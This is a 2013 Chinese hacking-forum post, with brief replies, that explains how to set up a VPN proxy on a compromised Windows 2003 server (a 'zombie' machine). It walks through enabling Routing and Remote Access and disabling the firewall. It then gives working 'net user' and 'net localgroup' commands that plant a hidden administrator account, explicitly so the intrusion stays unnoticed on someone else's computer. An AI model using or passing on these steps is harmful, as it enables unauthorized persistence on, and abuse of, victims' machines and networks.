Window2003服务器上搭建VPN
本帖最后由 浩森 于 2013-9-13 09:56 编辑前言
当你发现你的肉鸡Window2003配置很好,不充分利用就是一个浪费.因此本文通过讲解Window2003的VPN搭建,同时为了加强隐藏性,针对用户添加增加了隐藏,同时清理自己的系统日志.
在window2003搭建VPN方法
Window2003的VPN是默认安装,只是服务没有启动,我们只要对其配置就可以正常使用了。在搭建的过程中要注意关闭和开启一些服务,否则VPN将无法正常工作,主要包含以下几点:(运行输入service.msc)
1.远程注册表服务(Remote Registry)必须开启
2.Server服务必须开启
3.route路由和远程访问服务(Routing and Remote Access)必须开启
4.Workstation服务必须开启
5.系统自带防火墙(Windows Firewall/Internet Connection Sharing (ICS))关闭
下一步,启动”路由和远程访问”,打开”控制面板”à”管理工具”à”路由和远程访问”,然后在列出的本地服务器上点击右键,选择“配置并启用路由和远程访问”。如图01:
在弹出的对话框选择”下一步”,选择最后一项”自定义配置”,继续下一步,勾选”VPN访问”和”NAT和基本防火墙(A)”,下一步,如图02,03:
最后完成就完成第一步配置。
选择机器名,比如我这里是”HACKBASE”右击选择属性,切换到IP标签,如图04:
IP我们选择静态地址池,就是说连接上的VPN分配到的IP只能在这个设置的地址池。地址为任意的内网IP段。默认VPN服务占用第一个IP,即192.168.5.1是该服务器在虚拟局域网中的ip地址。
第二步:配置NAT/基本防火墙
选择树状中的”IP路由选择””NAT/基本防火墙”,弹出窗口选择”本地连接”,如图05配置:
因为我们是要在公网上连接我们肉鸡当代理的,因此要开启公网接口连接到Internet,然后应用确定。
第三步:配置静态路由
这里主要设置网关以让连接VPN的主机也能上公网。选择树状中的”IP路由选择””静态路由”,如图06添加IP设置:
Ok,如图配置,VPN服务端配置完成了。
创建隐藏账户
我们是在别人的机器上搭建的服务,因此隐蔽性对于我们来非常重要。而VPN默认是使用window内置账户认证的,因此我们必须创建一个账户具有连接VPN的账户。有朋友说可以通过已经存在账户进行设置允许VPN连接,虽然这样可以,但是隐蔽性还是不够好。
首先添加一个隐藏账户:
# 账户后表示隐藏账户,在cmd下看不到,在用户管理还是看得到
Net user xiaoc$ 123123 /add
# 将xiaoc$添加到本地管理员组
Net localgroup administrators xiaoc$ /add
并且将远程VPN访问权限赋予,”我的电脑”右击选择管理找到”本地用户和用户组”管理,选择xiaoc$这个用户选择属性,打开对话框选择”拨入”标签,允许访问勾选,也可以制定静态ip,必须在上面VPN的设置的静态地址池之间的范围。如图07
关于创建超级隐藏的用户,论坛已经有相关文章了,大家搜搜,本文主要讲解如何搭建VPN。
现在用2003的真少 很有用 又是一种方法 在法克看到一篇 结果不定事 希望这个可以。。 学习当中
页:
[1]